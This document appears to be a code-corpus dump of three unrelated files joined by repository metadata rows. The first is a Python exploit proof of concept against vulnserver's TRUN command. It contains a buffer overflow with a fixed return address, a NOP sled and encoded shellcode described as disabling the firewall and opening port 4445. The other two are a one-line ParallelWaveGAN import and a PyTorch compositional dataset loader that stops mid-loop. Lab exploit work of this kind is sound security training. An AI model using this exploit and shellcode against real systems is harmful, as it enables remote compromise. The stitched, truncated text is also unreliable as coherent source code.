] | null | null | null | winxp_sp3/trun/disable_firewall/registry_openport/trun_openport-registry_poc.py | danf42/vulnserver | 1b01aaa0f0b5706b5bc24c5f64d99dddcdcfe913 | [
"MIT"
] | null | null | null | import socket
import struct
print "\nTRUN Command - Open port 4445\n"
ip_addr = '192.168.199.130'
port = 9999
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((ip_addr, int(port)))
except Exception as e:
print "[-] Failed to connect to service %s" % e
else:
print "[+] Connected to server"
# Get banner response
data = s.recv(1024)
print(data)
# ./compile.sh firewall_4445
# perl -e 'print "<shellcode>"' > firewall_4445.bin
# cat firewall_4445.bin | msfvenom -b '\x00'
buf = (
"\xbe\x3e\x2c\xda\xe6\xda\xdc\xd9\x74\x24\xf4\x58\x29\xc9"
"\xb1\x42\x83\xc0\x04\x31\x70\x0f\x03\x70\x31\xce\x2f\xd7"
"\x9f\x87\x37\x91\x08\x19\x5b\xb2\x36\x19\xa4\xdb\x5f\x6a"
"\xd0\x1b\xf7\xf8\x6b\x40\x4b\x69\xe2\x28\x3c\x1b\x92\xb1"
"\x8d\xab\x07\x2a\x73\x2d\xa4\xc6\x1b\xf1\x73\x7b\xb4\x61"
"\x1a\xea\x26\x17\x8a\x88\xe6\xa5\x25\x39\x68\x2e\xdb\xcb"
"\x1c\xf2\x48\x58\xbd\x62\x03\xc9\x5e\x0a\xb3\x65\xcc\x9c"
"\x2c\x1e\x7e\x38\xc4\xbf\x16\xb1\x76\x06\x8f\x5d\xe2\xf2"
"\x2a\xec\x84\x9b\xc6\x71\x38\x34\x55\x01\x9e\x94\xf1\xa4"
"\x7d\x76\x64\x4f\xe3\x0a\x03\xeb\x8b\x99\x97\xa0\x23\x36"
"\x51\x2e\xd7\xa3\xf5\xec\x44\x49\x77\x65\x07\xc2\x12\x01"
"\xbf\x8a\xa8\x9b\x50\x3b\x3e\x28\xec\xd4\xd6\xa5\x80\x58"
"\x43\x2e\x20\xd0\xd7\xed\xc2\xb9\xbe\xa2\x46\xb7\xa2\x74"
"\xa7\x97\x75\x27\x4f\x27\x79\xc8\x8f\x07\x29\x86\xdd\xcf"
"\xcb\x26\xe2\x8f\x73\xc2\x0b\x52\xf4\xf4\x1c\x5c\x28\x58"
"\xf5\xa5\x98\x1e\x55\xb2\x14\x95\x61\x77\xdd\x37\xb8\xbe"
"\x8c\xdf\xde\x33\x5a\x20\x49\xd1\xc6\x1a\xfd\x71\x68\x3a"
"\x9f\xed\x1c\x86\x75\xd4\x99\x9e\xb3\x7c\x62\x0f\xac\x48"
"\x50\x9b\x19\x38\x79\xd2\xa1\x7a\x11\x0d\x22\x7b\xe1\x7c"
"\x72\x33\xb1\x2c\x8d\xf4\x89\x06\x9b\x26\x9e\x57\x8c\x26"
"\x57\x10\x3a\xb5\x4a\x17\xba\x95")
evil_buf = "TRUN /.:/"
evil_buf += 'A'*2003 + struct.pack("<I", 0x625011AF) + '\x90'*32 + buf
bytes_sent = s.send(evil_buf)
print "Sent %s bytes" % bytes_sent
finally:
s.close()
| 34.830508 | 75 | 0.648662 | 397 | 2,055 | 3.327456 | 0.602015 | 0.027252 | 0.02271 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.241826 | 0.13674 | 2,055 | 58 | 76 | 35.431034 | 0.502818 | 0.068613 | 0 | 0 | 0 | 0.47619 | 0.674175 | 0.603457 | 0 | 1 | 0.005238 | 0 | 0 | 0 | null | null | 0 | 0.047619 | null | null | 0.119048 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
a2621b4d1bfc9f2bb9223c69f40ff04bd74ea3d9 | 63 | py | Python | parallel_wavegan/models/__init__.py | mukeshv0/ParallelWaveGAN | 40fd282d0364c8d8711efed21d9689653d85b3a2 | [
"MIT"
] | 4 | 2020-01-10T06:26:50.000Z | 2022-03-22T23:40:03.000Z | parallel_wavegan/models/__init__.py | idcore/ParallelWaveGAN | 2908bc5bce95f903f27a015f172ffd1b20017560 | [
"MIT"
] | null | null | null | parallel_wavegan/models/__init__.py | idcore/ParallelWaveGAN | 2908bc5bce95f903f27a015f172ffd1b20017560 | [
"MIT"
] | null | null | null | from parallel_wavegan.models.parallel_wavegan import * # NOQA
| 31.5 | 62 | 0.825397 | 8 | 63 | 6.25 | 0.75 | 0.6 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 63 | 1 | 63 | 63 | 0.892857 | 0.063492 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
a299892ea61b1937f748a80fcb1f49c65d0dad27 | 57,547 | py | Python | data/dataset.py | XDUxyLi/SCEN-master | 43c3cc60fb20054bb55c0d9d9eb4e1f6082a1377 | [
"MIT"
] | null | null | null | data/dataset.py | XDUxyLi/SCEN-master | 43c3cc60fb20054bb55c0d9d9eb4e1f6082a1377 | [
"MIT"
] | null | null | null | data/dataset.py | XDUxyLi/SCEN-master | 43c3cc60fb20054bb55c0d9d9eb4e1f6082a1377 | [
"MIT"
] | null | null | null | # # #external libs
# import numpy as np
# from tqdm import tqdm
# from PIL import Image
# from PIL import ImageFilter
# import os
# import random
# from os.path import join as ospj
# from glob import glob
# #torch libs
# from torch.utils.data import Dataset
# import torch
# import torchvision.transforms as transforms
# #local libs
# from utils.utils import get_norm_values, chunks
# from models.image_extractor import get_image_extractor
# from itertools import product
# import math
#
# device = 'cuda' if torch.cuda.is_available() else 'cpu'
#
# class ImageLoader:
# def __init__(self, root):
# self.root_dir = root
#
# def __call__(self, img):
# img = Image.open(ospj(self.root_dir,img)).convert('RGB') #We don't want alpha
# return img
#
#
# def dataset_transform(phase, norm_family = 'imagenet'):
# '''
# Inputs
# phase: String controlling which set of transforms to use
# norm_family: String controlling which normaliztion values to use
#
# Returns
# transform: A list of pytorch transforms
# '''
# mean, std = get_norm_values(norm_family=norm_family)
#
# if phase == 'train':
# transform = transforms.Compose([
# transforms.RandomResizedCrop(224),
# transforms.RandomHorizontalFlip(),
# transforms.RandomApply([GaussianBlur([.1, 2.])], p=0.5),
# transforms.ToTensor(),
# transforms.Normalize(mean, std)
# ])
#
# elif phase == 'val' or phase == 'test':
# transform = transforms.Compose([
# transforms.Resize(256),
# transforms.CenterCrop(224),
# transforms.ToTensor(),
# transforms.Normalize(mean, std)
# ])
# elif phase == 'all':
# transform = transforms.Compose([
# transforms.Resize(256),
# transforms.CenterCrop(224),
# transforms.ToTensor(),
# transforms.Normalize(mean, std)
# ])
# else:
# raise ValueError('Invalid transform')
#
# return transform
#
# def filter_data(all_data, pairs_gt, topk = 5):
# '''
# Helper function to clean data
# '''
# valid_files = []
# with open('/home/ubuntu/workspace/top'+str(topk)+'.txt') as f:
# for line in f:
# valid_files.append(line.strip())
#
# data, pairs, attr, obj = [], [], [], []
# for current in all_data:
# if current[0] in valid_files:
# data.append(current)
# pairs.append((current[1],current[2]))
# attr.append(current[1])
# obj.append(current[2])
#
# counter = 0
# for current in pairs_gt:
# if current in pairs:
# counter+=1
# print('Matches ', counter, ' out of ', len(pairs_gt))
# print('Samples ', len(data), ' out of ', len(all_data))
# return data, sorted(list(set(pairs))), sorted(list(set(attr))), sorted(list(set(obj)))
#
# # Dataset class now
#
# class GaussianBlur(object):
# def __init__(self, sigma=[.1, 2.]):
# self.sigma = sigma
#
# def __call__(self, x):
# sigma = random.uniform(self.sigma[0], self.sigma[1])
# x = x.filter(ImageFilter.GaussianBlur(radius=sigma))
# return x
#
# class CompositionDataset(Dataset):
# '''
# Inputs
# root: String of base dir of dataset
# phase: String train, val, test
# split: String dataset split
# subset: Boolean if true uses a subset of train at each epoch
# num_negs: Int, numbers of negative pairs per batch
# pair_dropout: Percentage of pairs to leave in current epoch
# '''
# def __init__(
# self,
# root,
# phase,
# split = 'compositional-split',
# model = 'resnet18',
# norm_family = 'imagenet',
# subset = False,
# num_negs = 1,
# pair_dropout = 0.0,
# update_features = False,
# return_images = False,
# train_only = False,
# open_world=False
# ):
# self.root = root
# self.phase = phase
# self.split = split
# self.num_negs = num_negs
# self.pair_dropout = pair_dropout
# self.norm_family = norm_family
# self.return_images = return_images
# self.update_features = update_features
# self.feat_dim = 512 if 'resnet18' in model else 2048 # todo, unify this with models
# self.open_world = open_world
#
# self.attrs, self.objs, self.pairs, self.train_pairs, \
# self.val_pairs, self.test_pairs = self.parse_split()
# self.train_data, self.val_data, self.test_data = self.get_split_info()
# self.full_pairs = list(product(self.attrs,self.objs))
#
# # Clean only was here
# self.obj2idx = {obj: idx for idx, obj in enumerate(self.objs)}
# self.attr2idx = {attr : idx for idx, attr in enumerate(self.attrs)}
# if self.open_world:
# self.pairs = self.full_pairs
#
# self.all_pair2idx = {pair: idx for idx, pair in enumerate(self.pairs)}
#
# if train_only and self.phase == 'train':
# print('Using only train pairs')
# self.pair2idx = {pair : idx for idx, pair in enumerate(self.train_pairs)}
# else:
# print('Using all pairs')
# self.pair2idx = {pair : idx for idx, pair in enumerate(self.pairs)}
#
# if self.phase == 'train':
# self.data = self.train_data
# elif self.phase == 'val':
# self.data = self.val_data
# elif self.phase == 'test':
# self.data = self.test_data
# elif self.phase == 'all':
# print('Using all data')
# self.data = self.train_data + self.val_data + self.test_data
# else:
# raise ValueError('Invalid training phase')
#
# self.all_data = self.train_data + self.val_data + self.test_data
# print('Dataset loaded')
# print('Train pairs: {}, Validation pairs: {}, Test Pairs: {}'.format(
# len(self.train_pairs), len(self.val_pairs), len(self.test_pairs)))
# print('Train images: {}, Validation images: {}, Test images: {}'.format(
# len(self.train_data), len(self.val_data), len(self.test_data)))
#
# if subset:
# ind = np.arange(len(self.data))
# ind = ind[::len(ind) // 1000]
# self.data = [self.data[i] for i in ind]
#
#
# # Keeping a list of all pairs that occur with each object
# self.obj_affordance = {}
# self.train_obj_affordance = {}
# for _obj in self.objs:
# candidates = [attr for (_, attr, obj) in self.train_data+self.test_data if obj==_obj]
# self.obj_affordance[_obj] = list(set(candidates))
#
# candidates = [attr for (_, attr, obj) in self.train_data if obj==_obj]
# self.train_obj_affordance[_obj] = list(set(candidates))
#
# self.sample_indices = list(range(len(self.data)))
# self.sample_pairs = self.train_pairs
#
# # Load based on what to output
# self.transform = dataset_transform(self.phase, self.norm_family)
# self.loader = ImageLoader(ospj(self.root, 'images'))
# if not self.update_features:
# feat_file = ospj(root, model+'_featurers.t7')
# print(f'Using {model} and feature file {feat_file}')
# if not os.path.exists(feat_file):
# with torch.no_grad():
# self.generate_features(feat_file, model)
# self.phase = phase
# activation_data = torch.load(feat_file)
# self.activations = dict(
# zip(activation_data['files'], activation_data['features']))
# self.feat_dim = activation_data['features'].size(1)
# print('{} activations loaded'.format(len(self.activations)))
#
#
# def parse_split(self):
# '''
# Helper function to read splits of object atrribute pair
# Returns
# all_attrs: List of all attributes
# all_objs: List of all objects
# all_pairs: List of all combination of attrs and objs
# tr_pairs: List of train pairs of attrs and objs
# vl_pairs: List of validation pairs of attrs and objs
# ts_pairs: List of test pairs of attrs and objs
# '''
# def parse_pairs(pair_list):
# '''
# Helper function to parse each phase to object attrribute vectors
# Inputs
# pair_list: path to textfile
# '''
# with open(pair_list, 'r') as f:
# pairs = f.read().strip().split('\n')
# pairs = [line.split() for line in pairs]
# pairs = list(map(tuple, pairs))
#
# attrs, objs = zip(*pairs)
# return attrs, objs, pairs
#
# tr_attrs, tr_objs, tr_pairs = parse_pairs(
# ospj(self.root, self.split, 'train_pairs.txt')
# )
# vl_attrs, vl_objs, vl_pairs = parse_pairs(
# ospj(self.root, self.split, 'val_pairs.txt')
# )
# ts_attrs, ts_objs, ts_pairs = parse_pairs(
# ospj(self.root, self.split, 'test_pairs.txt')
# )
#
# #now we compose all objs, attrs and pairs
# all_attrs, all_objs = sorted(
# list(set(tr_attrs + vl_attrs + ts_attrs))), sorted(
# list(set(tr_objs + vl_objs + ts_objs)))
# all_pairs = sorted(list(set(tr_pairs + vl_pairs + ts_pairs)))
#
# return all_attrs, all_objs, all_pairs, tr_pairs, vl_pairs, ts_pairs
#
# def get_split_info(self):
# '''
# Helper method to read image, attrs, objs samples
#
# Returns
# train_data, val_data, test_data: List of tuple of image, attrs, obj
# '''
# data = torch.load(ospj(self.root, 'metadata_{}.t7'.format(self.split)))
#
# train_data, val_data, test_data = [], [], []
#
# for instance in data:
# image, attr, obj, settype = instance['image'], instance['attr'], \
# instance['obj'], instance['set']
# curr_data = [image, attr, obj]
#
# if attr == 'NA' or (attr, obj) not in self.pairs or settype == 'NA':
# # Skip incomplete pairs, unknown pairs and unknown set
# continue
#
# if settype == 'train':
# train_data.append(curr_data)
# elif settype == 'val':
# val_data.append(curr_data)
# else:
# test_data.append(curr_data)
#
# return train_data, val_data, test_data
#
# def get_dict_data(self, data, pairs):
# data_dict = {}
# for current in pairs:
# data_dict[current] = []
#
# for current in data:
# image, attr, obj = current
# data_dict[(attr, obj)].append(image)
#
# return data_dict
#
#
# def reset_dropout(self):
# '''
# Helper function to sample new subset of data containing a subset of pairs of objs and attrs
# '''
# self.sample_indices = list(range(len(self.data)))
# self.sample_pairs = self.train_pairs
#
# # Using sampling from random instead of 2 step numpy
# n_pairs = int((1 - self.pair_dropout) * len(self.train_pairs))
#
# self.sample_pairs = random.sample(self.train_pairs, n_pairs)
# print('Sampled new subset')
# print('Using {} pairs out of {} pairs right now'.format(
# n_pairs, len(self.train_pairs)))
#
# self.sample_indices = [ i for i in range(len(self.data))
# if (self.data[i][1], self.data[i][2]) in self.sample_pairs
# ]
# print('Using {} images out of {} images right now'.format(
# len(self.sample_indices), len(self.data)))
#
# def sample_negative(self, attr, obj):
# '''
# Inputs
# attr: String of valid attribute
# obj: String of valid object
# Returns
# Tuple of a different attribute, object indexes
# '''
# new_attr, new_obj = self.sample_pairs[np.random.choice(
# len(self.sample_pairs))]
#
# while new_attr == attr and new_obj == obj:
# new_attr, new_obj = self.sample_pairs[np.random.choice(
# len(self.sample_pairs))]
#
# return (self.attr2idx[new_attr], self.obj2idx[new_obj])
#
# def sample_affordance(self, attr, obj):
# '''
# Inputs
# attr: String of valid attribute
# obj: String of valid object
# Return
# Idx of a different attribute for the same object
# '''
# new_attr = np.random.choice(self.obj_affordance[obj])
#
# while new_attr == attr:
# new_attr = np.random.choice(self.obj_affordance[obj])
#
# return self.attr2idx[new_attr]
#
# def sample_train_affordance(self, attr, obj):
# '''
# Inputs
# attr: String of valid attribute
# obj: String of valid object
# Return
# Idx of a different attribute for the same object from the training pairs
# '''
# new_attr = np.random.choice(self.train_obj_affordance[obj])
#
# while new_attr == attr:
# new_attr = np.random.choice(self.train_obj_affordance[obj])
#
# return self.attr2idx[new_attr]
#
# def generate_features(self, out_file, model):
# '''
# Inputs
# out_file: Path to save features
# model: String of extraction model
# '''
# # data = self.all_data
# data = ospj(self.root,'images')
# files_before = glob(ospj(data, '**', '*.jpg'), recursive=True)
# files_all = []
# for current in files_before:
# parts = current.split('/')
# if "cgqa" in self.root:
# files_all.append(parts[-1])
# else:
# files_all.append(os.path.join(parts[-2],parts[-1]))
# transform = dataset_transform('test', self.norm_family)
# feat_extractor = get_image_extractor(arch = model).eval()
# feat_extractor = feat_extractor.to(device)
#
# image_feats = []
# image_files = []
# for chunk in tqdm(
# chunks(files_all, 512), total=len(files_all) // 512, desc=f'Extracting features {model}'):
#
# files = chunk
# imgs = list(map(self.loader, files))
# imgs = list(map(transform, imgs))
# feats = feat_extractor(torch.stack(imgs, 0).to(device))
# image_feats.append(feats.data.cpu())
# image_files += files
# image_feats = torch.cat(image_feats, 0)
# print('features for %d images generated' % (len(image_files)))
#
# torch.save({'features': image_feats, 'files': image_files}, out_file)
#
#
#
#
# def __getitem__(self, index):
# '''
# Call for getting samples
# '''
# index = self.sample_indices[index]
#
# image, attr, obj = self.data[index]
#
# # Decide what to output
# if not self.update_features:
# img = self.activations[image]
# else:
# img = self.loader(image)
# img = self.transform(img)
#
#
# data = [img, self.attr2idx[attr], self.obj2idx[obj], self.pair2idx[(attr, obj)]]
# # data = [img, self.attr2idx[attr], self.obj2idx[obj], self.pair2idx[(attr, obj)]]
#
# if self.phase == 'train':
#
# img_pos_obj = [_img for (_img, _, _obj) in self.train_data if _obj == obj]
# img_pos_att = [_img for (_img, _att, _) in self.train_data if _att == attr]
# img_pos = [_img for (_img, _att, _obj) in self.train_data if _obj == obj and _att == attr]
#
# for i in range(len(img_pos)):
# img_pos[i] = self.activations[img_pos[i]]
# if len(img_pos) >= 1:
# img_pos_feats = random.sample(img_pos, 1)
# else:
# img_pos_feats = []
# img_pos_feats.append(img_pos)
#
# for i in range(len(img_pos_obj)):
# img_pos_obj[i] = self.activations[img_pos_obj[i]]
# if len(img_pos_obj) > 10:
# img_pos_obj_feats = random.sample(img_pos_obj, 10)
# else:
# if len(img_pos_obj) != 0:
# img_pos_obj_feats = []
# while len(img_pos_obj_feats) < 10:
# for i in range(len(img_pos_obj)):
# img_pos_obj_feats.append(img_pos_obj[i])
# if len(img_pos_obj_feats) == 10:
# break
# # img_pos_obj_feats = img_pos_obj.repeat(math.ceil(10 / len(img_pos_obj)), 1)[:10]
# else:
# img_pos_obj_feats = torch.Tensor(10, len(img_pos_att[0]))
#
#
# for i in range(len(img_pos_att)):
# img_pos_att[i] = self.activations[img_pos_att[i]]
# if len(img_pos_att) > 10:
# img_pos_att_feats = random.sample(img_pos_att, 10)
# else:
# if len(img_pos_obj) != 0:
# img_pos_obj_feats = []
# while len(img_pos_obj_feats) < 10:
# for i in range(len(img_pos_obj)):
# img_pos_obj_feats.append(img_pos_obj[i])
# if len(img_pos_obj_feats) == 10:
# break
# # img_pos_obj_feats = img_pos_obj.repeat(math.ceil(10 / len(img_pos_obj)), 1)[:10]
# else:
# img_pos_obj_feats = torch.Tensor(10, len(img_pos_att[0]))
#
# img_pos_obj_feats = torch.tensor([item.cpu().detach().numpy() for item in img_pos_obj_feats])
# img_pos_att_feats = torch.tensor([item.cpu().detach().numpy() for item in img_pos_att_feats])
# img_pos_feats = torch.tensor([item.cpu().detach().numpy() for item in img_pos_feats])
#
# all_neg_attrs = []
# all_neg_objs = []
#
# for curr in range(self.num_negs):
# neg_attr, neg_obj = self.sample_negative(attr, obj) # negative for triplet lose
# all_neg_attrs.append(neg_attr)
# all_neg_objs.append(neg_obj)
#
# neg_attr, neg_obj = torch.LongTensor(all_neg_attrs), torch.LongTensor(all_neg_objs)
#
# #note here
# if len(self.train_obj_affordance[obj])>1:
# inv_attr = self.sample_train_affordance(attr, obj) # attribute for inverse regularizer
# else:
# inv_attr = (all_neg_attrs[0])
#
# comm_attr = self.sample_affordance(inv_attr, obj) # attribute for commutative regularizer
#
#
# data += [neg_attr, neg_obj, inv_attr, comm_attr, img_pos_obj_feats, img_pos_att_feats, img_pos_feats]
#
# # Return image paths if requested as the last element of the list
# if self.return_images and self.phase != 'train':
# data.append(image)
#
# return data
#
# def __len__(self):
# '''
# Call for length
# '''
# return len(self.sample_indices)
# #external libs
import numpy as np
from tqdm import tqdm
from PIL import Image
from PIL import ImageFilter
import os
import random
from os.path import join as ospj
from glob import glob
#torch libs
from torch.utils.data import Dataset
import torch
import torchvision.transforms as transforms
#local libs
from utils.utils import get_norm_values, chunks
from models.image_extractor import get_image_extractor
from itertools import product
import math
device = 'cuda' if torch.cuda.is_available() else 'cpu'
class ImageLoader:
def __init__(self, root):
self.root_dir = root
def __call__(self, img):
img = Image.open(ospj(self.root_dir,img)).convert('RGB') #We don't want alpha
return img
def dataset_transform(phase, norm_family = 'imagenet'):
'''
Inputs
phase: String controlling which set of transforms to use
        norm_family: String controlling which normalization values to use
Returns
transform: A list of pytorch transforms
'''
mean, std = get_norm_values(norm_family=norm_family)
if phase == 'train':
transform = transforms.Compose([
transforms.RandomResizedCrop(224),
transforms.RandomHorizontalFlip(),
transforms.RandomApply([GaussianBlur([.1, 2.])], p=0.5),
transforms.ToTensor(),
transforms.Normalize(mean, std)
])
elif phase == 'val' or phase == 'test':
transform = transforms.Compose([
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize(mean, std)
])
elif phase == 'all':
transform = transforms.Compose([
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize(mean, std)
])
else:
raise ValueError('Invalid transform')
return transform
def filter_data(all_data, pairs_gt, topk = 5):
'''
Helper function to clean data
'''
valid_files = []
with open('/home/ubuntu/workspace/top'+str(topk)+'.txt') as f:
for line in f:
valid_files.append(line.strip())
data, pairs, attr, obj = [], [], [], []
for current in all_data:
if current[0] in valid_files:
data.append(current)
pairs.append((current[1],current[2]))
attr.append(current[1])
obj.append(current[2])
counter = 0
for current in pairs_gt:
if current in pairs:
counter+=1
print('Matches ', counter, ' out of ', len(pairs_gt))
print('Samples ', len(data), ' out of ', len(all_data))
return data, sorted(list(set(pairs))), sorted(list(set(attr))), sorted(list(set(obj)))
# Dataset class now
class GaussianBlur(object):
def __init__(self, sigma=[.1, 2.]):
self.sigma = sigma
def __call__(self, x):
sigma = random.uniform(self.sigma[0], self.sigma[1])
x = x.filter(ImageFilter.GaussianBlur(radius=sigma))
return x
class CompositionDataset(Dataset):
'''
Inputs
root: String of base dir of dataset
phase: String train, val, test
split: String dataset split
subset: Boolean if true uses a subset of train at each epoch
        num_negs: Int, number of negative pairs per batch
pair_dropout: Percentage of pairs to leave in current epoch
'''
def __init__(
self,
root,
phase,
split = 'compositional-split',
model = 'resnet18',
norm_family = 'imagenet',
subset = False,
num_negs = 1,
pair_dropout = 0.0,
update_features = False,
return_images = False,
train_only = False,
open_world=False
):
self.root = root
self.phase = phase
self.split = split
self.num_negs = num_negs
self.pair_dropout = pair_dropout
self.norm_family = norm_family
self.return_images = return_images
self.update_features = update_features
self.feat_dim = 512 if 'resnet18' in model else 2048 # todo, unify this with models
self.open_world = open_world
self.attrs, self.objs, self.pairs, self.train_pairs, \
self.val_pairs, self.test_pairs = self.parse_split()
self.train_data, self.val_data, self.test_data = self.get_split_info()
self.full_pairs = list(product(self.attrs,self.objs))
# Clean only was here
self.obj2idx = {obj: idx for idx, obj in enumerate(self.objs)}
self.attr2idx = {attr : idx for idx, attr in enumerate(self.attrs)}
if self.open_world:
self.pairs = self.full_pairs
self.all_pair2idx = {pair: idx for idx, pair in enumerate(self.pairs)}
if train_only and self.phase == 'train':
print('Using only train pairs')
self.pair2idx = {pair : idx for idx, pair in enumerate(self.train_pairs)}
else:
print('Using all pairs')
self.pair2idx = {pair : idx for idx, pair in enumerate(self.pairs)}
if self.phase == 'train':
self.data = self.train_data
elif self.phase == 'val':
self.data = self.val_data
elif self.phase == 'test':
self.data = self.test_data
elif self.phase == 'all':
print('Using all data')
self.data = self.train_data + self.val_data + self.test_data
else:
raise ValueError('Invalid training phase')
self.all_data = self.train_data + self.val_data + self.test_data
print('Dataset loaded')
print('Train pairs: {}, Validation pairs: {}, Test Pairs: {}'.format(
len(self.train_pairs), len(self.val_pairs), len(self.test_pairs)))
print('Train images: {}, Validation images: {}, Test images: {}'.format(
len(self.train_data), len(self.val_data), len(self.test_data)))
if subset:
ind = np.arange(len(self.data))
ind = ind[::len(ind) // 1000]
self.data = [self.data[i] for i in ind]
# Keeping a list of all pairs that occur with each object
self.obj_affordance = {}
self.train_obj_affordance = {}
for _obj in self.objs:
candidates = [attr for (_, attr, obj) in self.train_data+self.test_data if obj==_obj]
self.obj_affordance[_obj] = list(set(candidates))
candidates = [attr for (_, attr, obj) in self.train_data if obj==_obj]
self.train_obj_affordance[_obj] = list(set(candidates))
self.sample_indices = list(range(len(self.data)))
self.sample_pairs = self.train_pairs
# Load based on what to output
self.transform = dataset_transform(self.phase, self.norm_family)
self.loader = ImageLoader(ospj(self.root, 'images'))
if not self.update_features:
feat_file = ospj(root, model+'_featurers.t7')
print(f'Using {model} and feature file {feat_file}')
if not os.path.exists(feat_file):
with torch.no_grad():
self.generate_features(feat_file, model)
self.phase = phase
activation_data = torch.load(feat_file)
self.activations = dict(
zip(activation_data['files'], activation_data['features']))
self.feat_dim = activation_data['features'].size(1)
print('{} activations loaded'.format(len(self.activations)))
def parse_split(self):
'''
        Helper function to read splits of object attribute pairs
Returns
all_attrs: List of all attributes
all_objs: List of all objects
all_pairs: List of all combination of attrs and objs
tr_pairs: List of train pairs of attrs and objs
vl_pairs: List of validation pairs of attrs and objs
ts_pairs: List of test pairs of attrs and objs
'''
def parse_pairs(pair_list):
'''
            Helper function to parse each phase to object attribute vectors
Inputs
pair_list: path to textfile
'''
with open(pair_list, 'r') as f:
pairs = f.read().strip().split('\n')
pairs = [line.split() for line in pairs]
pairs = list(map(tuple, pairs))
attrs, objs = zip(*pairs)
return attrs, objs, pairs
tr_attrs, tr_objs, tr_pairs = parse_pairs(
ospj(self.root, self.split, 'train_pairs.txt')
)
vl_attrs, vl_objs, vl_pairs = parse_pairs(
ospj(self.root, self.split, 'val_pairs.txt')
)
ts_attrs, ts_objs, ts_pairs = parse_pairs(
ospj(self.root, self.split, 'test_pairs.txt')
)
#now we compose all objs, attrs and pairs
all_attrs, all_objs = sorted(
list(set(tr_attrs + vl_attrs + ts_attrs))), sorted(
list(set(tr_objs + vl_objs + ts_objs)))
all_pairs = sorted(list(set(tr_pairs + vl_pairs + ts_pairs)))
return all_attrs, all_objs, all_pairs, tr_pairs, vl_pairs, ts_pairs
def get_split_info(self):
'''
Helper method to read image, attrs, objs samples
Returns
train_data, val_data, test_data: List of tuple of image, attrs, obj
'''
data = torch.load(ospj(self.root, 'metadata_{}.t7'.format(self.split)))
train_data, val_data, test_data = [], [], []
for instance in data:
image, attr, obj, settype = instance['image'], instance['attr'], \
instance['obj'], instance['set']
curr_data = [image, attr, obj]
if attr == 'NA' or (attr, obj) not in self.pairs or settype == 'NA':
# Skip incomplete pairs, unknown pairs and unknown set
continue
if settype == 'train':
train_data.append(curr_data)
elif settype == 'val':
val_data.append(curr_data)
else:
test_data.append(curr_data)
return train_data, val_data, test_data
def get_dict_data(self, data, pairs):
data_dict = {}
for current in pairs:
data_dict[current] = []
for current in data:
image, attr, obj = current
data_dict[(attr, obj)].append(image)
return data_dict
def reset_dropout(self):
'''
Helper function to sample new subset of data containing a subset of pairs of objs and attrs
'''
self.sample_indices = list(range(len(self.data)))
self.sample_pairs = self.train_pairs
# Using sampling from random instead of 2 step numpy
n_pairs = int((1 - self.pair_dropout) * len(self.train_pairs))
self.sample_pairs = random.sample(self.train_pairs, n_pairs)
print('Sampled new subset')
print('Using {} pairs out of {} pairs right now'.format(
n_pairs, len(self.train_pairs)))
self.sample_indices = [ i for i in range(len(self.data))
if (self.data[i][1], self.data[i][2]) in self.sample_pairs
]
print('Using {} images out of {} images right now'.format(
len(self.sample_indices), len(self.data)))
def sample_negative(self, attr, obj):
'''
Inputs
attr: String of valid attribute
obj: String of valid object
Returns
Tuple of a different attribute, object indexes
'''
new_attr, new_obj = self.sample_pairs[np.random.choice(
len(self.sample_pairs))]
while new_attr == attr and new_obj == obj:
new_attr, new_obj = self.sample_pairs[np.random.choice(
len(self.sample_pairs))]
return (self.attr2idx[new_attr], self.obj2idx[new_obj])
def sample_affordance(self, attr, obj):
'''
Inputs
attr: String of valid attribute
obj: String of valid object
Return
Idx of a different attribute for the same object
'''
new_attr = np.random.choice(self.obj_affordance[obj])
while new_attr == attr:
new_attr = np.random.choice(self.obj_affordance[obj])
return self.attr2idx[new_attr]
def sample_train_affordance(self, attr, obj):
'''
Inputs
attr: String of valid attribute
obj: String of valid object
Return
Idx of a different attribute for the same object from the training pairs
'''
new_attr = np.random.choice(self.train_obj_affordance[obj])
while new_attr == attr:
new_attr = np.random.choice(self.train_obj_affordance[obj])
return self.attr2idx[new_attr]
def generate_features(self, out_file, model):
'''
Inputs
out_file: Path to save features
model: String of extraction model
'''
# data = self.all_data
data = ospj(self.root,'images')
files_before = glob(ospj(data, '**', '*.jpg'), recursive=True)
files_all = []
for current in files_before:
parts = current.split('/')
if "cgqa" in self.root:
files_all.append(parts[-1])
else:
files_all.append(os.path.join(parts[-2],parts[-1]))
transform = dataset_transform('test', self.norm_family)
feat_extractor = get_image_extractor(arch = model).eval()
feat_extractor = feat_extractor.to(device)
image_feats = []
image_files = []
for chunk in tqdm(
chunks(files_all, 512), total=len(files_all) // 512, desc=f'Extracting features {model}'):
files = chunk
imgs = list(map(self.loader, files))
imgs = list(map(transform, imgs))
feats = feat_extractor(torch.stack(imgs, 0).to(device))
image_feats.append(feats.data.cpu())
image_files += files
image_feats = torch.cat(image_feats, 0)
print('features for %d images generated' % (len(image_files)))
torch.save({'features': image_feats, 'files': image_files}, out_file)
def __getitem__(self, index):
'''
Call for getting samples
'''
index = self.sample_indices[index]
image, attr, obj = self.data[index]
# Decide what to output
if not self.update_features:
img = self.activations[image]
else:
img = self.loader(image)
img = self.transform(img)
data = [img, self.attr2idx[attr], self.obj2idx[obj], self.pair2idx[(attr, obj)]]
if self.phase == 'train':
img_pos_obj = [_img for (_img, _, _obj) in self.train_data if _obj == obj]
img_pos_att = [_img for (_img, _att, _) in self.train_data if _att == attr]
for i in range(len(img_pos_obj)):
